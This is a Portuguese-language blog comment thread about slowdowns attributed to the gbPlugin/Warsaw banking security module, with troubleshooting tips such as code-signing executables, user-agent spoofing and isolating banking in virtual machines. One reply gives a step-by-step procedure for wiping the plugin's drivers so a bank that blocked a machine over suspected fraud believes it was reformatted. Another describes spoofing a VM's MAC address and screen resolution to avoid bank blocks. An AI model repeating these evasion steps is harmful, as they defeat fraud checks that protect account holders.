        Em nossos clientes, sempre que se abria o nosso sistema e em seguida o usuário tentava abrir o Banco do Brasil, o micro ficava lento, o software travava e só reiniciando o micro ou matando o processo do Plugin para que voltasse ao normal.
        Os Programadores descobriram que na hora da compilação do programa era necessário possuir uma Assinatura Digital no executável. E após realizado este procedimento, o problema não mais ocorreu.
        Então na verdade, o que ocorre e o que foi descoberto é que a GAS Tecnologia faz este tipo de verificação nos arquivos. Isso não quer dizer que o usuário deverá recompilar qualquer outro software, mas onde for possível, deverá sim solicitar a Software House o procedimento.
        Espero ter esclarecido e ajudado, no mais fique a vontade para fazer o que desejar.

        • Jefferson - 6.606 Comentários
          17/10/2015 at 8:13 · Responder

          Marcelo, obrigado pelo esclarecimento. Da próxima vez que eu me deparar com o problema de lentidão vou verificar se há algum software não assinado rodando ao mesmo tempo que o malware da GAS e se desinstalá-lo faz com que o PC volte a ficar rápido mesmo sem tirar o gbplugin.

          Mas eu não entendi por que você sempre frisa que o software é proprietário. Você acha que se o software fosse livre faria alguma diferença?

          • Marcelo Zola - 4 Comentários
            17/10/2015 at 8:33 · Responder

            Na verdade foi um “achado”. Nós trabalhamos/desenvolvemos um software de gestão para o ramo de Lojas de Tintas. E temos cerca de 29 programadores. E o problema ocorria sempre que tentavam usar o sistema e o site do BB era aberto e carregava aquela porcaria.
            Foi feito uma mobilização aqui na empresa e durante 10 dias pesquisaram sobre o assunto.
            A GAS Porcaria sequer responde emails, porém um dos Programadores descobriu isso. Pois não nunca tivemos esta preocupação em colocar a tal assinatura digital no executável principal, mas deu certo.
            Quanto a software livre, aí eu acho que vai depender do que realmente esta em uso ou sendo carregado naquele momento. O que é certo pelo ao menos é que há esta verificação.
            No nosso caso, imagine temos milhares de clientes e o problema estava insustentável, pois alguns não aceitavam a nossa “desculpa”, dizendo que “só ficava lento o micro depois que abriam o sistema e após não conseguiam utilizar o micro!”

            • Jefferson - 6.606 Comentários
              17/10/2015 at 8:48 · Responder

              Grato pela contribuição. Pode ter sido a informação mais valiosa que já recebi sobre o assunto e vou investigar isso na primeira oportunidade. Um de meus clientes usa um software de gestão que certamente não é assinado e a diretora financeira reclama o tempo todo da lentidão provocada pelo malware da GAS. Tive que pedir para ela conviver com o problema. Se isso puder ser resolvido com assinatura, vou brigar com o desenvolvedor do software (afinal, meu cliente paga manutenção), para assinar o troço.

              • Marcelo Zola - 4 Comentários
                17/10/2015 at 8:52 · Responder

                Que bom Jefferson.
                Espero que consiga êxito.
                Quis contribuir porque este problema é de longa data e sei o tamanho do transtorno que causa a todos.
                Abraços.

                • Saulo Benigno - 279 Comentários
                  03/11/2015 at 14:10 · Responder

                  Jefferson não valeria um post no blog sobre isso? Para se alguém pesquisar no Google chegar e ler a respeito disto?

            • Luis Wagner - 1 Comentário
              03/11/2015 at 14:35 · Responder

              Boa tarde Marcelo.
              Você pode me dar detalhes de qual programas usaram para assinar digitalmente o executável ?
              Usamos delphi aqui na empresa mas não consegui encontrar nada a respeito na própri IDE..

              Muito Obrigado
              Wagner :)

              • Jefferson - 6.606 Comentários
                03/11/2015 at 14:44 · Responder

                Isso não é feito na IDE.

                O processo se divide em duas partes:

                1)Obter e instalar o certificado. Você pode comprar um certificado digital na Serasa Experian, por exemplo, ou criar um certificado válido apenas para você (auto-assinar). Eu não sei como o GbPlugin reagiria a executáveis auto-assinados, mas vale a pena tentar para não ter que pagar por um certificado só para isso.

                2)Assinar o executável. Isso não precisa ser feito durante a compilação. Você pode até assinar executáveis de terceiros.

                Eu nunca tentei fazer isso, mas segundo o tutorial é muito fácil.

  • Wanderson Perin - 1 Comentário
    20/10/2015 at 9:56 · Responder

    Bom dia pessoal, estou tendo um problema com o Banco do Brasil, uma maquina aqui da empresa foi bloqueada devido a suspeita de fraude, então o Banco exigiu que eu formatasse a máquina, porém eu não formatei, eu apenas restaurei(windows 10)usando a opção de manter os arquivos do usuário. Agora o banco informou que eu não formatei o PC…porém tenho certeza que o PC está limpo, e eu não quero fazer uma formatação do zero…a dúvida é…como eu posso fazer para o banco deixar de identificar essa máquina? como eles rastreiam ela a ponto de saber que eu não formatei? Pelo MAC? Pelo nome do computador? Pelo IP? Alguém pode me ajudar?

    • Marcio - 6 Comentários
      24/10/2015 at 2:26 · Responder

      Eles devem instalar algum arquivo em algum diretório do windows, que só será apagado se você souber que arquivo é esse e ir lá deletar. Como você não sabe qual arquivo, ou mesmo um registro, acaba tendo que formatar a máquina. Tente usar um daqueles programas tipo CCleaner, talvez ele encontre no rastreio esse registro ou arquivo e elimine o desgraçado.
      Infelizmente esse plugin do BB é uma dor de cabeça.

      • VR5 - 397 Comentários
        24/10/2015 at 12:31 · Responder

        Aqui na empresa tivemos um caso semelhante e a única solução foi formatar. A pessoa quem me dá suporte me explicou o porque. Segunda-feira eu falo melhor. ;)

  • Helio Casarotto - 1 Comentário
    25/10/2015 at 2:18 · Responder

    Instalei o Crome e o site do BB ficou normal.

    • VR5 - 397 Comentários
      03/11/2015 at 20:42 · Responder

      Dependendo da versão do Chrome ele não aceita mais o plugin do BB…

      • Jefferson - 6.606 Comentários
        03/11/2015 at 20:54 · Responder

        E por isso, até onde sei, você não consegue mais entrar na conta.

        Mas isso pode variar. Tem conta de empresa do BB que estranhamente parece não requerer Java.

        • VR5 - 397 Comentários
          03/11/2015 at 21:19 · Responder

          Isso não tem a ver com o uso (ou não) daquele “token” (o pen drive) que o BB fornece a seus correntistas empresariais?

          • Jefferson - 6.606 Comentários
            03/11/2015 at 21:26 · Responder

            Eu não tenho certeza. Eu vi uma cliente fazer isso na semana passada e ela tem quatro contas no BB e um punhado de tokens. Uma (e apenas uma) das quatro contas não requer java para consulta. Disso eu tenho certeza, porque o Java estava completamente bichado nessa máquina e nessa conta ela entrava. Mas não lembro se ela colocou o token.

  • L Fernando - 1 Comentário
    09/11/2015 at 17:35 · Responder

    Até julho deste ano era muito simples pular este GBPLUGIN para acessar bancos
    O GBPLUGIN só era necessário para acessar via INTERNET EXPLORER, nos demais navegadores bastava ter o PLUGIN. Então era só instalar tudo para todos os bancos e em seguida dra um boot com uma pendrive linux e excluir o GBPLUGIN, a pasta toda.
    Tudo funcionava muito bem, desde que não acessasse via INTERNET EXPLORER
    Mas a partir de julho deste ano eles inventaram o WARSAW, DESATIVARAM OS plugins e tudo virou uma tremenda dor de cabeça, maquinas com o GBPLUGIN instalado perde muito rendimento
    O WARSAW nada mais é que um programa que monitora a existência do gbPLUGIN, se excluir a pasta GBPLUGIN , em seguida o WARSAW fara o download contra sua vontade e reinstalará o mesmo.
    A CAIXA FEDERAL continua funcionando apenas com o plugin

  • Cristiano - 1 Comentário
    11/11/2015 at 13:35 · Responder

    Boa tarde
    Estou tendo bastante problemas com o G-buster modulo de segurança do BB e Itau meu sistemas oracle vira numa carroça nas consultas e relatórios o que vc surgere nesse caso?
    Se puder me ajudar grato.

    • Marcelo Carvalho - 2 Comentários
      16/11/2015 at 10:09 · Responder

      Tem a solução aqui, Cristiano: Solução: https://goo.gl/wflwGF

      Você pode fazer o uso de um “User Agent” de Linux no Firefox.

      Sistemas desenvolvidos em Delphi, .NET, Oracle ou qualquer outra plataforma tem ficado lento quando o plugin “Warsaw” é acionado ao acessar o banco ou, tão somente, aberto o navegador e/ou iniciado o sistema (ele inicia como um serviço junto com o Windows).

      O seu sistema em Oracle tem ficado lento, provavelmente porque ele não tem uma Certificação de Autoridade para o Código desenvolvido. Com isso, o Warsaw fica achando que ele pode ser um vírus (por ser um software de terceiro, sem uma certificação de idoneidade), pois trafega informações em rede, e fica trabalhando em cima dele tentando identificar algo de errado. Por isso a lentidão.

      Desinstalando somente o “Warsaw” e o “modulo de segurança” (stormfish), pelo painel de controle do Windows, já resolve. O Gbplugin pode deixar (a desinstalação dele requer um código junto ao banco ou a remoção da pasta dele por um Live CD).
      Vale lembrar que, antigamente, a GAS Tecnologia (desenvolvedora do “modulo de segurança”, atualmente “Warsaw”) instalava um serviço que fica filtrando os dados que passavam pela placa de rede. Então, confira na propriedade da sua conexão de rede (onde seta o IP manualmente) se existe um serviço chamado “GAS TECNOLOGIA FILTER”. Se sim, desative-o.

      Seguindo o Tutorial (link no inicio), vc consegue resolver o problema com o acesso ao Banco posterior a essas desinstalações.

      Boa sorte, meu amigo!

  • VR5 - 397 Comentários
    11/11/2015 at 14:20 · Responder

    Tente no Face deles. AS VEZES eles respondem e colocam a disposição o “Fale Conosco” deles. Nos mantenha atualizado… https://www.facebook.com/GasTecnologiaBR/timeline

  • marco - 1 Comentário
    15/11/2015 at 22:38 · Responder

    o warsaw me impossibilitava de abrir navegadores, a não ser que eu desabilitasse o firewall do antivirus….a solução encontrada foi remover o warsaw mas deixar modulo de segurança do bco e fazer acesso a pagina do bco pelo explorer, mas nao pelo chrome…desta forma, meu firewall ficou habilitado e os navegadores ok…..

  • Marcelo Carvalho - 2 Comentários
    16/11/2015 at 9:44 · Responder

    Solução:

    Mudando o “User Agent” (emular outro navegador) do Firefox (Chrome não oferece mais suporte ao JAVA, com isso os bancos não irão funcionar nele), resolve. Não havendo a necessidade de instalar um Linux (fisico ou em máquina virtual).

    Vale para acesso a qualquer banco, seja pessoa fisica ou juridica (com token ou sem).

    Espero que ajude! :D

    TUTORIAL PARA CRIAR UM USER AGENT NO FIREFOX: https://goo.gl/wflwGF

    • Gustavo - 1 Comentário
      12/03/2016 at 9:45 · Responder

      Fiz questão de comentar aqui que este tutorial resolveu em definitivo minha situação que não conseguia solucionar nem com o stormfish. Obrigado

  • Emerson - 1 Comentário
    18/11/2015 at 16:20 · Responder

    Realmente aqui também estamos tendo muitos problemas. Se alguém tiver alguma dica de como proceder, porque inclusive já reclamei no site da Gas Tecnologia, enviei os executaveis como pediram e os caminhos do compartilhamento, me retornaram depois de alguns dias dizendo que os ajustes foram feitos e para que fizesse a atualização. Já atualizei, mas continua a mesma porcaria.

  • Mellany - 1 Comentário
    14/01/2016 at 12:15 · Responder

    Jefferson, parabéns pelo teu blog, é NOTA 10!

    Trabalho com 2 bancos, Caixa e BB. No meu caso não tenho opção, pois sou o financeiro da empresa e preciso acessar as contas pelo pc, ou seja, preciso me render “aos desencantos” do Warsaw. Como começou a dar problemas, fiz a desinstalação do programa e módulos de segurança no painel de controles/programas. Todos desinstalados corretamente exceto qual? Warsaw! ao tentar reinstalar os módulos de segurança, aparece mensagem que já tenho versão antiga do warsaw e pergunta se quero atualizar. OK, vamos atualizar… em seguida aparece mensagem de que não pode ser desinstalado pq não existe no computador. Alguma dica de como posso desinstalar corretamente (talvez manualmente ou em modo de segurança) para depois reinstalar do zero como se nunca tivesse existido no meu computador?

    Abs,
    Mellany

  • Saulo Benigno - 279 Comentários
    06/05/2016 at 15:51 · Responder

    Viram isso?

    Plugin de segurança usado pelos bancos tem falha que permite vazamento de dados
    “Warsaw, que permite acesso ao internet banking do Banco do Brasil, Caixa e outros, tem brecha não corrigida”
    https://tecnoblog.net/195255/warsaw-plugin-bancos-falha-seguranca/

  • Snow_man - 311 Comentários
    06/05/2016 at 19:06 · Responder

    Caramba, Saulo, assim fica mais complicado ainda. Tenho cliente na mesma situação que a Mellany descreve, por ser financeiro e precisar acessar bancos. Infelizmente ficamos nas mãos dos bancos que não se importam em atualizar suas aplicações; um bom exemplo disso é que a maioria trava ao se atualizar o java.

  • Jefferson - 6.606 Comentários
    03/06/2016 at 4:32 · Responder

    Novo problema, com o sistema comercial de um cliente.

    Entrada de dados com leitor de código de barras lenta, como se cada caractere estivesse sendo digitado manualmente;
    Rolagem lenta dos itens na tela.

    O usuário estava teimando em culpar o desenvolvedor do sistema comercial, mas quando vi que a máquina tinha o maldito “gbpsv” rodando, desconfiei imediatamente dele. O usuário resistiu à idéia, mas o propósito dessa máquina não era acesso a bancos e a primeira e única coisa que fiz foi usar um LiveCD para remover todos os traços do malware e o problema então foi resolvido.

  • Guilherme Augusto - 1 Comentário
    17/06/2016 at 16:56 · Responder

    Boa tarde, colegas. Não sou da área, mas sou um curioso e procuro sempre resolver os problemas do meu computador com a ajuda de fóruns e tutoriais. Em geral consigo o que quero, mas o meu nêmesis e maior frustração no último ano pelo menos tem sido esses GB, warsaw e trusteer. Meu computador tem estado absurdamente lento, parando, dando várias travadas no plugin do Firefox tbm; o chrome quando eu uso as vezes desliga o computador sozinho e do nada (nem sei se está relacionado tbm aos problemas decorrentes dessa GAS maldita). Decidi q não vou usar o internet banking do BB mais, depois que li todos os comentários aqui (pelos quais agradeço, pq me ajudaram a identificar q o problema de lentidão e processos zumbis que aparecem no gerenciador são por causa dessa maldição da GAS). Porém, agora estou me deparando com uma dificuldade pra excluir as coisas relacionadas a isso. Segui o tutorial do Marcelo lá de 25/09/2014, mas quando vou excluir a pasta no %temp% não aparece pasta, aparece só um XML; consegui excluir o ‘security’ no Registro; consegui excluir o warsaw pelo painel de controle; e não tenho conseguido excluir a pasta GB no arquivos de programas, pq ela diz q não tenho permissão de administrador, o q não é vdd, pq o computador é só meu e eu sempre tive a permissão de administrador pra tudo o q precisou. Como resolver esse impasse? Alguém me ajuda?

    Também queria saber se o Trusteer tem dado o mesmo problema, pq vou exclui-lo tbm, pelo painel de controle mesmo (dps disso será q ficam resquícios dele no computador)?

    Desde já agradeço,
    Atenciosamente,
    Guilherme.

  • Edmundo - 1 Comentário
    19/06/2016 at 19:36 · Responder

    Olá, primeiramente obrigado! estava ficando quase louco com meu pc, ele estava fechando o programa LOJE 2013 sozinho, eu tentei de tudo formatei o pc reinstalei o loje até ai tudo jóia quando instalei o software da GAS o loje parou de funcionar, eu pensei que fosse outra coisa que tivesse causando o o problema, pois tinha instalado outros programas tb, então fui desinstalando uma a um, só deixei o BB pois jamais imaginei que pudesse ser ele, não adiantou então fiz uma restauração do sistema instalei novamente o loje e ele funcionou perfeitamente, instalei todos os outros programas e tb o da GAS, em seguida O LOGE não abria mais, resolvi então pesquisar sobre o assunto graças a Deus achei esse blog, desinstalei o GAS e tudo voltou ao normal, mais uma vez obrigado!outra coisa acabei formatando o pc poque ele estava muito lento o leitor do codigo de barras estava como vc falou lendo digito por digito, achei que se tratava de virus, passei antivirus, defrag, fiz uma limpesa nas pastas, não adiantou, acabei formatando, agora vejo que foi desnecessária a formatação era só excluir essa merda da GAS.

  • Dioni Vidal - 2 Comentários
    29/06/2016 at 10:10 · Responder

    Oi Jefferson, cara, estou com um big problema com o acesso ao BB, será que você conseguiria me ajudar? Sou analista de suporte da TI de uma indústria alimentícia, e estamos pela 3ª vez com problema com o BB, eles disseram que um notebook nosso de um diretor estava com vírus, apesar de eu ter rodado várias soluções, (adwcleaner, JRT, spyhunter, bitdefender, etc) eles recusam liberar o acesso desta máquina, e só liberam caso eu formate o micro, porém eu já formatei e consegui o acesso por 2 dias, e bloquearam novamente, e mais uma vez querem que eu formate a máquina.
    Eu já rodei o autoruns e exclui os registros no regedit que ele apontou como em uso pelo gbplugin, já apaguei a pasta gbplugin pelo live cd do fedora, e reinstalei o módulo de segurança mas mesmo assim ele reconhece que não formatei, continua como senha bloqueada, de outro micro ele acessa normalmente. Você teria alguma dica de algo que eu possa tentar fazer sem ter que ficar formatando a máquina toda vez?
    Muito obrigado desde já.
    Dioni Vidal – [endereço de email deletado]

    • Jefferson - 6.606 Comentários
      29/06/2016 at 10:41 · Responder

      Procedimento por alto, pois não tenho uma máquina com o malware da GAS instalado agora

      Obviamente, sempre trabalhe desativando todas as opções de ocultar arquivos do Windows.

      Usando um LiveCD

      Em “Arquivos de Programas”, “Program Files” e “Arquivos de Programas (x86)” Apague todas as pastas que tenham os seguintes nomes

      Gas Informatica
      Diebold
      gbplugin -esta é a mais importante, pois é onde está o driver que impede você de realmente apagar tudo.
      Warsaw

      A partir deste ponto você não precisa mais do LiveCD e pode apagar/desativar tudo dentro do Windows

      Faça o mesmo em
      c:\ProgramData
      c:\users\NOME DO USUARIO\Appdata\Local
      c:\users\NOME DO USUARIO\Appdata\LocalLow
      c:\users\NOME DO USUARIO\Appdata\Roaming

      Aproveite para apagar todo o conteúdo de
      c:\users\NOME DO USUARIO\Appdata\Local\Temp\
      c:\windows\temp\

      Usando o Autoruns, na seção Drivers ou Services, procure por todos os arquivos relacionados à GAS e desative-os
      Existem pelo menos dois com nome gb*.* e mais um ou dois que começam com a letra W.

      Anote seus nomes e depois apague-os. Eles devem estar todos em c:\windows\system32\drivers\

      Alguns deles:
      gbpkm.sys
      gbpndisrd.sys – apagar este é que faz perder o acesso à rede
      wsddfac.sys
      wsddpp.sys

      Abra todas as conexões de Rede da máquina e nas propriedades de TCP/IP desative qualquer filtro relacionado à GAS, ou a conexão com a rede não funcionará porque os filtros foram apagados.

      Por último, use o Voidtools Everything para procurar por qualquer referência a “gbplugin”, “warsaw” ou “gas” e até pelos nomes de drivers acima no HDD. Você pode ter deixado de ver algo e o Everything é muito útil inclusive para achar pastas virtualizadas.

      Reinicie a máquina. Isso deverá ser suficiente para que o BB ache que a máquina foi formatada.

  • Jefferson - 6.606 Comentários
    29/06/2016 at 11:39 · Responder

    Eu ainda não tenho certeza, mas tive a impressão de que no Windows 8 e no Windows 10 o malware da GAS não consegue rodar também no Modo de Segurança e por isso é possível apagá-lo nesses sistemas sem precisar de um LiveCD.

    • VR5 - 397 Comentários
      29/06/2016 at 14:18 · Responder

      No 8 e no 10 já existe a opção de desinstalar ele sem problemas. AS VEZES (principalmente depois de uma atualização do Windows) e se é mesmo necessário ter ele recomenda-se desinstalá-lo e depois ir no site do banco e executar a instalação dele de novo. A GAS e os bancos atualizam as versões mas “inteligentemente” a atualização (fora emergências extremas) não acontece automaticamente nos PCs…

  • Dioni Vidal - 2 Comentários
    29/06/2016 at 14:54 · Responder

    Oi Jefferson!
    Este micro está com Windows 7 Pro 64bits, fiz todos os procedimentos que você me passou e após, reinstalei o Plugin novamente (Diagnóstico BB) mas infelizmente ainda continua bloqueado, ocorre o erro Senha bloqueada, e no firefox consta um erro como: Dados não conferem, mas de outro micro acesso normalmente. Eles pegam alguma informação no windows que ainda não consegui descobrir qual…. :(
    Muitíssimo obrigado pela atenção e boa vontade.
    Não sei mais o que tentar :(
    Se vc ou alguém que me lê souber alguma dica, por gentileza me ajude…

  • Jefferson - 6.606 Comentários
    18/07/2016 at 22:50 · Responder

    Hoje eu visitei um cliente que deixou de usar o Windows XP em meados de 2014 porque estava estranhamente lento e dando problemas esquisitos que eu não conseguia resolver. Na época eu instalei o Windows 7 em dual boot. No Windows 7 não dava problema algum e eu continuei sem saber o que estava havendo.

    Isso ocorreu meses antes de eu finalmente me dar conta do que o malware da GAS estava fazendo e escrever este post.

    Com o tempo ele passou a usar exclusivamente o Windows 7 mas a instalação do XP não foi apagada. Hoje eu fui chamado para resolver um problema no Windows 7 e dei boot pelo XP para fazer a manutenção. Notei de cara a demora excessiva exibindo a mensagem “Aplicando configurações pessoais” e quando finalmente entrou fui logo olhar no Gerenciador de Tarefas: lá estava o maldito processo gbpsv.

    Como esse cliente há muito tempo passou a acessar o banco apenas em um MAC, pedi autorização para remover o plugin de suas instalações do Windows. Olhei logo na partição Windows 7: não estava instalado lá, o que explica por que o Windows 7 nunca apresentou problemas bizarros nessa mesma máquina. Fiz a manutenção que tinha que fazer no Windows 7, dei boot por ele e removi o plugin da partição XP. Logo no primeiro boot pelo XP meu cliente ficou espantado com a diferença. O XP ficou “normal” após remover o malware da GAS.

  • Fernando Avelar - 1 Comentário
    20/07/2016 at 15:12 · Responder

    Jefferson, tudo bem?
    Tenho uma pergunta pra ti, referente a este malware da gas, se você não instalar, você não acessa sua conta do BB, se instalar você mal consegue acessar a sua máquina, será que vou ter que comprar montar uma máquina com um I7 8GB de ram só pra poder rodar esta porcaria.

  • Mario Catrileo - 1 Comentário
    15/08/2016 at 10:40 · Responder

    Bom dia,

    Estamos com problemas em duas maquinas de 2 clientes diferentes a primeira, utiliza 9 bancos diferentes, todos com o GBplugin e Rapport, e realmente a maquina com SSD vira uma carroça, estamos sem alternativas para fazer o funcionamento da mesma,a segunda utiliza apenas 2 bancos o santander e BB, após utilização do BB a maquina trava e o gerenciado de tarefas nem abre, maqina também com SSD.

    Tem alguma solução sem ser ter que remover o GBplugin?

    • Jefferson - 6.606 Comentários
      15/08/2016 at 17:23 · Responder

      A solução mais “simples” e eficiente é fazer uma máquina virtual, instalar todas as porcarias bancárias nela e usar apenas ela para acesso a banco. E usa-la apenas para isso, sem instalar um programa sequer que não seja estritamente necessário. O malware da GAS, contido em uma máquina virtual, não consegue de jeito nenhum provocar os problemas que cria quando está à solta na máquina real.

      Depois você reinstala o Windows da máquina real sem o malware da GAS nele e copia a máquina virtual para lá.

      Para quem sabe criar máquinas virtuais isso é facílimo. O problema maior é treinar o usuário, mas se ele não for uma toupeira (e eu espero que quem manuseia contas bancárias de uma empresa não seja) não vai ter muita dificuldade para dominar as transições entre máquina real e máquina virtual.

  • Daniel - 1 Comentário
    15/08/2016 at 14:40 · Responder

    Muitos clientes reclamando de lentidão em seus PC’s e quando percebemos, lá estavam os plugins do BB. Se removê-los a coisa volta ao normal. Droga de plugin.

  • VR5 - 397 Comentários
    15/08/2016 at 16:54 · Responder

    Solução definitiva: descobrir QEM é o “Boss” do setor de TI do BB e fazer eles desenvolverem um app EXCLUSIVO (independente de browser)para o BB como existe para smartphones… li comentários que isso existe no Itaú. Procede?

  • Trabson - 1 Comentário
    01/09/2016 at 14:50 · Responder

    a ideia de maquinas virtual é muito boa ! más dependendo o ambiente não posso simplesmente instalar qualquer versão windows em uma vm.. existe a questão de licenciamento, na empresa em que eu atendo o setor financeiro sofre um bocado.. tem de lidar com pagamentos , transações e etc com BB ,bradesco, santander, itau, caixa.. e esses malditos plugins deixam a experiencia do usuário totalmente ruim , e pra ajudar a maioria dos bancos só trabalham com funcionalidade completa com o IE ! estou pensando em soluçoes como a do user-agent

  • Hugo Vandresenm - 1 Comentário
    03/10/2016 at 18:57 · Responder

    No meu caso depois de muitos problemas com os plugins da Gas Informatica, agora utilizo uma maquina virtual, utilizei o Windows XP SP3 funcionou por um tempo mas depois deu erro. Utilizei depois o Windows 8.1 funcionou mas tem o problema da licença do sistema operacional, a melhor solução que encontrei e a qual estou utilizando agora é uma maquina virtual usando o VirtualBox e com o sistema operacional Linux Lubuntu uma versão mais leve do Ubuntu o sistema é grátis e a iso tem apenas 752 MB em comparação com os diversos gigas de outros sistemas.
    Para poder acessar os sites dos bancos é necessário instalar o java no Lubuntu, sempre fui usuário do Windows, mas não tive problemas em instalar os arquivos necessários. Existem diversos tutoriais disponíveis na internet, com todos os comando a serem digitados no terminal.
    Para não terem dor de cabeça fica a solução, para o meu caso está resolvendo, talvez resolva para alguns de vocês também.
    Agora acesso os sites do Banco do Brasil e da Caixa tranquilamente.

  • Wellington Ribeiro - 1 Comentário
    28/10/2016 at 9:18 · Responder

    Pessoal, é inacreditável que estes problemas ainda ocorrem!
    Usei por tempos o user agent para acesso ao internet banking da caixa, porém agora não é mais viável, pois pede para instalar o plugin. Que pena..
    Estava lendo em um outro fórum que há a possibilidade de solicitar um “plugin corporativo” que é enviado pelo banco e não dá problemas. Isso existe mesmo?

  • ruy edy - 1 Comentário
    10/11/2016 at 9:52 · Responder

    é INCRÍVEL QUE O RESPONSÁVEL POR ELIMINAR ESSES PROBLEMAS AINDA NÃO TENHA FEITO NADA,MESMO DEPOIS DE TANTAS RECLAMAÇÕES.A GAS INFORMÁTICA NÃO QUER GANHAR O RESPEITO E ADMIRAÇÃO DO PÚBLICO,MAS AO CONTRARIO SÓ GERA RAIVA E DESPREZO PELA INCOMPETÊNCIA E LENTIDÃO EM TIRAR DO MERCADO ESTE PRODUTO QUE SÓ ATRAPALHA E AFASTA O USUÁRIO DO BANCO DO BRASIL

  • VR5 - 397 Comentários
    11/11/2016 at 9:22 · Responder

    “Oia”: aqui na empresa há MUITO tempo que o problema acabou… e usamos o plugin normalmente… estranho (mas que bom!)…

  • Walter - 2 Comentários
    30/12/2016 at 8:40 · Responder

    Bela dica. Sabe se tem um método semelhante para a CEF?

    Recentemente eu instalei um novo W7 (limpinho das pragas) e um segundo em dual boot só pros bancos, mas resolvi instalar uma máquina virtual para simplificar. A CEF eu acessei normalmente mas o BB simplesmente bloqueou minha senha de internet, coisa que nunca me aconteceu em mais de 10 anos. Sabem se pode ser incompatibilidade com a MV ou o Windows XP que instalei nela?

  • Luciano - 493 Comentários
    27/02/2017 at 16:09 · Responder

    Não sei porque, mas eu não estou surpreso:

    https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Warsaw.aspx

    Jefferson, postei aqui pra não virar bagunça, mas acharia legal você fazer um post relembrando o assunto e com essa agora que a Sophos já classifica essa praga como vírus!

    • Jefferson - 6.606 Comentários
      27/02/2017 at 16:59 · Responder

      Luciano, pouco ou nada naquela página faz sentido. Primeiro a SOPHOS diz ter proteção contra o vírus desde 1994 e tenho razoável certeza de que a GAS nem trabalhava com segurança bancária online na época, depois a “análise detalhada” diz tratar-se de um “virus polones de 850 bytes que contém o texto “FBC Warsaw#-# virus 1990”. Além disso fazer pouco sentido, para uma “análise detalhada” é ridículo.

    • Jefferson - 6.606 Comentários
      27/02/2017 at 17:09 · Responder

      E, curiosamente, o primeiro resultado do Google para “FBC Warsaw” é a Primeira Igreja Batista Warsaw, EUA.

      Já “Warsaw” é a capital da Polônia, que conhecemos como Varsóvia. O único motivo que vejo para a SOPHOS achar que se trata de um “virus polonês”, que faz referência a uma igreja norte-americana, publicado por uma empresa brasileira.

  • daniel - 1 Comentário
    02/03/2017 at 17:38 · Responder

    a nova versao dos plugins da gas tecnologia bloqueiam a senha de quem usa maquina virtual. Consegui bloquear a minha senha 4 vezes seguidas usando uma maquina virtual, e depois que desisti e começei a usar no windows normal da maquina, nunca mais bloqueou a senha.
    O jeito é mudar de banco para um que deixa usar sem essa porcaria, tipo o BB que deixa usar apenas com java se o user agent for linux, ou o itau que tem software avulso para acesso vir pc (vc faz download de um programa, instala e usa, não é plugin e nao fica rodando no background)

  • thomas - 1 Comentário
    08/03/2017 at 11:57 · Responder

    parece que o BB agora obriga a instalar esse malware mesmo pra quem usa linux.

    há anos vinha usando o linux para acessar o bb sem essa porcaria de malware da GAS mas hoje eis que acusa que não tenho o módulo de segurança instalado no ubuntu.

  • Snow_man - 311 Comentários
    11/08/2017 at 16:23 · Responder

    Caramba, levei uma surra hoje.
    A cliente formatou (não comigo) pra Windows 10 e quer usar o BB no Firefox.

    A versão que instalaram pra ela foi a 54, e sabemos que a partir da 52 não tem java.
    Baixei a 51, o java já estava instalado; não funcionou.

    Desinstalei o Warsaw e instalei de novo (isso é uma dica), aí funcionou no Internet Explorer, e, que bom, funcionou no Chrome, mas nada no Firefox.
    Tentei a dica do User Agent Switcher mas sem sucesso.

    Desisti e falei pra ela usar nos que funcionaram. DETESTO isso no BB.

    • Jefferson - 6.606 Comentários
      11/08/2017 at 16:33 · Responder

      É uma loteria. Houve caso em que eu tive que deixar uma tabela com o cliente indicando que navegadores usar com que bancos. E claro que essa tabela nunca é a mesma.

  • Vinícius - 1 Comentário
    16/12/2017 at 20:41 · Responder

    É um total absurdo e falta de respeito com os clientes por parte dos bancos (utilizo o BB).
    Quando o autor escreveu este post em setembro de 2014, os plugins dos bancos já matavam muito gente de raiva há anos. Muitas pessoas pagam visitas técnicas e formatação de seus computadores pensando ter um pc infectado por meia dúzia de vírus, quando na verdade, tudo não passa de um maldito plugin de banco que deixa a máquina extremamente lenta.
    É uma faca de 2 gumes.. por lado, podemos ir ao banco e enfrentar filas enormes perdendo precioso tempo (sem chance!!), por outro, acessar o banco via internet e evitar aquela canseira seria ótimo, mas a raiva que passamos por conta do software… sinceramente, não sei o que é pior.

  • Matuto - 129 Comentários
    17/12/2017 at 3:11 · Responder

    No meu caso, utilizo Linux pra acessar os bancos em casa. Comprei um notebook velho de um amigo e botei o Lubuntu só pra isso.

    • Snow_man - 311 Comentários
      18/12/2017 at 19:09 · Responder

      Matuto, estou nessa pegada, com Lubuntu; mas não consegui compartilhamento de pastas: eu salvo os comprovantes bancários na hora, em PDF (navego com Firefox); mas aí só ficam salvos na máquina virtual, queria copiar para o windows, e num tutorial que vi não deu certo. Sabe como fazer?

      • Matuto - 129 Comentários
        18/12/2017 at 20:52 · Responder

        Snow man, no meu caso eu também imprimo os comprovantes pra PDF, mas copio pra um pendrive ou mando por e-mail pro micro pessoal.

        O que tu precisa é instalar o Samba (simulador de servidor Windows) e depois configurar com o mesmo grupo de trabalho que tu usa em casa. Depois tu compartilha uma pasta em algum micro com Windows e daí pelo Lubuntu tu copia pra lá. É parecido com o processo para compartilhar uma impressora do Windows no Linux.

        *OBS: A última vez que tentei isso, eu não sei porque não deu certo, aí desisti por falta de “saco” com Linux. Hehehe

      • Jefferson - 6.606 Comentários
        18/12/2017 at 21:23 · Responder

        Isso é fácil, depois que você entende como funciona o recurso “pastas compartilhadas” do Virtualbox. O programa não é lá muito intuitivo quanto a isso. Eu vou publicar um tutorial sobre o assunto.

        • Matuto - 129 Comentários
          18/12/2017 at 23:41 · Responder

          Ahhh… eu não percebi que ele usa máquina virtual. Realmente facilita. É só configurar no programa que pasta quer compartilhar e lá no Lubuntu ela vai aparecer no navegador de pastas.

          No meu caso, uso Lubuntu instalado num HD, não é virtualização.

  • Zeca Lote - 12 Comentários
    19/12/2017 at 3:20 · Responder

    Uso o internet banking da CEF, e, usando VMs, já ocorreu de bloquearem minha assinatura eletrônica umas 2 ou 3 vezes.

    O que fiz, que (aparentemente) resolveu foi o seguinte: antes de abrir o navegador e ir para o site, sempre verifico a resolução da VM, e deixo em algum valor “padrão” de displays físicos (ou seja, não deixo a VM com “qualquer” resolução, como ocorre se redimensioná-la livremente, por exemplo); e, também, configurei os 3 primeiros octetos do endereço MAC da placa de rede da VM com um valor de algum fabricante real de NICs.

